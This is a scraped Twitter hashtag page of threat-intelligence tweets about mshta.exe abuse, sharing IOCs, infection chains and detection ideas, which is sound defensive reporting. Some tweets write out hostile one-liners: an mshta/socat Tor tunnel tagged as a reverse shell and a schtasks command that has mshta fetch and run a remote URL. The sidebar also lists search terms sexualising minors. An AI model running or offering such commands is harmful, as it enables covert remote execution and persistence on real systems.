Top Tweets for #mshta
A simple detection rule in #KQL to detect #OneNote spawning #MSHTA
#ThreatHunting #MicorosftSecurity
https://t.co/j30R6Qb9B9
@nf3xn @wvuuuuuuuuuuuuu That is great if people think ahead aka โthere is a new #lolbin itโs #mshta.exe it runs hta files with #jscriptโ
#opendir #javascript executed via #mshta
hxxp://ia801504.us.archive[.]org/13/items/sknna/
https://t.co/hTs0ij3P1e
![jstrosch's tweet photo. #opendir #javascript executed via #mshta
hxxp://ia801504.us.archive[.]org/13/items/sknna/
https://t.co/hTs0ij3P1e https://t.co/tTsXOf6Iqx](https://pbs.twimg.com/media/FCJ7zCwX0AogtWt.jpg)
LOLBin / LOLBas of the week
mshta.exe vbscript:close(CreateObject("https://t.co/YGGO0rPYQi").Run("socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:https://t.co/05tKYuUh9a,socksport=9050",0,False)) #reverseshell #mshta #onion
Latest #Ursnif campaign moves from #PowerShell to #Mshta to launch attack. PSA, block macros entering the environment from the internet! Via @zscaler. #infosec #Cybersecurity #DFIR #cybercrime #CISO #malware #IOC https://t.co/uK6Ubl0zgN
In 51% of the incidents @CrowdStrike responded to in 2019, adversaries employed #malware-free techniques at some point during the intrusion. Malware-free techniques include, but are not limited to, #PowerShell, #scripting, #Mshta and #WMI. @dynamicCISO https://t.co/E6NN07ag1S

#malicious doc #fireeye URL reference, associated with #lokibot
โฃ๏ธ SWIFT,60 000 usd.doc
๐ b0d05dc918e285497474847e6734d6e0 ๐
๐ 162[.213.211.]234:1216/fireeye โ๏ธ #jscript ๐
โฃ๏ธ __Incapsula_Resource
๐ 2064f1494dc06629264564b854b2c4ad
#EQNEDT32 > #mshta > #PowerShell > #wermgr
![jorgemieres's tweet photo. #malicious doc #fireeye URL reference, associated with #lokibot
โฃ๏ธ SWIFT,60 000 usd.doc
๐ b0d05dc918e285497474847e6734d6e0 ๐
๐ 162[.213.211.]234:1216/fireeye โ๏ธ #jscript ๐
โฃ๏ธ __Incapsula_Resource
๐ 2064f1494dc06629264564b854b2c4ad
#EQNEDT32 > #mshta > #PowerShell > #wermgr https://t.co/QEW3pZruDj](https://pbs.twimg.com/media/ET4h_zBUUAEQKqz.png)
#opendir @UN-themed #phishing #malware site www.sso.unite.un[.]org.joelwisian[.]com hosts ~3 #trojan #droppers + 2 #NorthKorea #macro #powershell #mshta North_Korea.docm (MD5: 5c5bf32736a852c1a1c40d0ae5b8ec33)
Ref: https://t.co/aRSClAixjS
@JAMESWT_MHT - beat me to it lol
![rpsanch's tweet photo. #opendir @UN-themed #phishing #malware site www.sso.unite.un[.]org.joelwisian[.]com hosts ~3 #trojan #droppers + 2 #NorthKorea #macro #powershell #mshta North_Korea.docm (MD5: 5c5bf32736a852c1a1c40d0ae5b8ec33)
Ref: https://t.co/aRSClAixjS
@JAMESWT_MHT - beat me to it lol https://t.co/m1zi60dBqX](https://pbs.twimg.com/media/EFX358DXYAAR9f1.jpg)
#opendir again #unknow
https://t.co/I1RLJ3xHkD
https_//reunionhomesok.com/wp-includes/js/view/
/Duxuu.hta
/Normal.src
/North_Korea.doc
/North_Korea.docm
/Duxuu0.hta
@reecdeep @Arkbird_SOLG @sugimu_sec @malwrhunterteam @James_inthe_box @VirITeXplorer

We're getting evil here . #AbsoluteZero #MSHTA #payload integrated successfully.โ
Next one ๐ Encrypted connection.

#Schtasks #Mshta "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 500 /tn "MSOFFICEER" /tr "mshta vbscript:CreateObject(\"Wscript[.]Shell\").Run(\"mshta.exe <URL>\",0,true)(window.close)" /F #CyberSecurity #Malware
#PE -> #mshta (/update.drp.su/mustang/tools/run.hta) -> moves window to (-50000, 0), redirects to (/mustang/main.html). It includes ./main.js (#JScript) -> #bitsadmin (
/download.drp.su/soft/ +
window.lang === 'ru' ? 'AvastAntivirusB.exe' : 'AvastAntivirusWorldwideE.exe')

New release of #oletools inspired me to investigate #dde capability in #excel. Awesome updt. But is it only about cmd? No. You can run any cmd with #dde. In this example, I show how to use #mshta to run notepad via #dde. limitation: len(cmd name) <= 8 chars
@decalage2 @Oddvarmoe

#multi #stage: #docx contains external #Relationship elm (#oleObject) -> #rtf doc contains #ole obj --> execs #mshta to dl/exec #hta (#exploit) -> #vbscript runs #powershell to dl #PE file
(All external files are hosted on amazon #aws #s3 @AWS_Security)
https://t.co/p91t424WZL

Wanna protect school children?
Make Schools Hard Targets Again.
#MSHTA #AskingForTheChildren #ParklandShooting

Last Seen Hashtags on Sotwe
เธฃเธฑเธเธเธฒเธเธเธถเธเธเธฒเธฌ
Seen from Thailand
cunny
Seen from United Kingdom
Momson
Seen from Germany
transformersbumblebee
Seen from United States
TEENAGER filter:videos
Seen from Israel
nolimit nolimit momson*
Seen from United States
ใใฃในใ
momson #teenage
Seen from Pakistan
NTR
Seen from Indonesia
Most Popular Users

Elon Musk 
@elonmusk
240.8M followers

Barack Obama 
@barackobama
119.2M followers

Donald J. Trump 
@realdonaldtrump
111.7M followers

Cristiano Ronaldo 
@cristiano
111.1M followers

Narendra Modi 
@narendramodi
107M followers

Rihanna 
@rihanna
97.8M followers

NASA 
@nasa
92.2M followers

Justin Bieber 
@justinbieber
91M followers

KATY PERRY 
@katyperry
87.9M followers

Taylor Swift 
@taylorswift13
81.8M followers

Lady Gaga 
@ladygaga
73.3M followers

Virat Kohli 
@imvkohli
70.3M followers

Kim Kardashian 
@kimkardashian
69.9M followers

YouTube 
@youtube
68.7M followers

Bill Gates 
@billgates
64M followers

Neymar Jr 
@neymarjr
63.1M followers

The Ellen Show
@theellenshow
62.4M followers

CNN 
@cnn
61.9M followers

Selena Gomez 
@selenagomez
61M followers

X 
@x
60.8M followers


![RexorVc0's tweet photo. #APT #TengyunSnake #threat #Malware APT-C-61
๐ฅAttacks Pakistan, Bangladesh, Iran and Turkey
โ๏ธ#Phishing > Payload DOC/PDF > #ISO | #LNK + #MSHTA
Report of 360CTI:https://t.co/NfRxG7tCzO
IOC:
il1[.]000webhostapp[.]com
a0w.herokuapp[.]com
https://1drv[.]ms https://t.co/chDTqPdGo8](https://pbs.twimg.com/media/FqMr4IPXwAARq7x.jpg)
![RexorVc0's tweet photo. #APT #TengyunSnake #threat #Malware APT-C-61
๐ฅAttacks Pakistan, Bangladesh, Iran and Turkey
โ๏ธ#Phishing > Payload DOC/PDF > #ISO | #LNK + #MSHTA
Report of 360CTI:https://t.co/NfRxG7tCzO
IOC:
il1[.]000webhostapp[.]com
a0w.herokuapp[.]com
https://1drv[.]ms https://t.co/chDTqPdGo8](https://pbs.twimg.com/media/FqMrdcgX0AIGfrF.jpg)
![RexorVc0's tweet photo. #APT #TengyunSnake #threat #Malware APT-C-61
๐ฅAttacks Pakistan, Bangladesh, Iran and Turkey
โ๏ธ#Phishing > Payload DOC/PDF > #ISO | #LNK + #MSHTA
Report of 360CTI:https://t.co/NfRxG7tCzO
IOC:
il1[.]000webhostapp[.]com
a0w.herokuapp[.]com
https://1drv[.]ms https://t.co/chDTqPdGo8](https://pbs.twimg.com/media/FqMrU1TXwAA7JP0.jpg)











![rpsanch's tweet photo. #opendir @UN-themed #phishing #malware site www.sso.unite.un[.]org.joelwisian[.]com hosts ~3 #trojan #droppers + 2 #NorthKorea #macro #powershell #mshta North_Korea.docm (MD5: 5c5bf32736a852c1a1c40d0ae5b8ec33)
Ref: https://t.co/aRSClAixjS
@JAMESWT_MHT - beat me to it lol https://t.co/m1zi60dBqX](https://pbs.twimg.com/media/EFX358CXoAAJCuo.jpg)
![rpsanch's tweet photo. #opendir @UN-themed #phishing #malware site www.sso.unite.un[.]org.joelwisian[.]com hosts ~3 #trojan #droppers + 2 #NorthKorea #macro #powershell #mshta North_Korea.docm (MD5: 5c5bf32736a852c1a1c40d0ae5b8ec33)
Ref: https://t.co/aRSClAixjS
@JAMESWT_MHT - beat me to it lol https://t.co/m1zi60dBqX](https://pbs.twimg.com/media/EFX358AX4AAvM5l.jpg)
![rpsanch's tweet photo. #opendir @UN-themed #phishing #malware site www.sso.unite.un[.]org.joelwisian[.]com hosts ~3 #trojan #droppers + 2 #NorthKorea #macro #powershell #mshta North_Korea.docm (MD5: 5c5bf32736a852c1a1c40d0ae5b8ec33)
Ref: https://t.co/aRSClAixjS
@JAMESWT_MHT - beat me to it lol https://t.co/m1zi60dBqX](https://pbs.twimg.com/media/EFX358AXkAA-jku.jpg)















